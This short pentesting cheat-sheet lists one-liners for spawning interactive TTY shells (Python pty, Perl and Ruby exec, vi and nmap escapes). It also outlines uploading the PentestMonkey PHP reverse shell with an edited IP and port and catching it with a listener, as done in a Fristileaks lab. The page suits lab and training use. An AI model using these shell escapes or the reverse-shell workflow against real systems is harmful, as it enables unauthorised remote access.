Shells

shell.jpg

TTY Shell

Spawning a TTY Shell is very common when doing a Pen test. Here are some common way to spawn them.

  • python -c 'import pty; pty.spawn("/bin/sh")'
  • echo os.system('/bin/bash')
  • /bin/sh -i
  • perl —e 'exec "/bin/sh";'
  • perl: exec "/bin/sh";
  • ruby: exec "/bin/sh"
  • {From within vi}  :!bash
  • {From within vi} :set shell=/bin/bash:shell
  • {From nmap} !sh

                                                    Credit: NetSec

 

 

Php Reverse Shell

One of my favorite php reverse shells that i use is from PentestMonkey

  • First download and save the php Script
  • Next modify the code to best suite your needs

    $ip = '127.0.0.1';  // CHANGE THIS

    $port = 1234;       // CHANGE THIS

  • Once uploaded then start a listener to capture the shell as shown when I completed the Fristileak 1.3 lab
kit13.png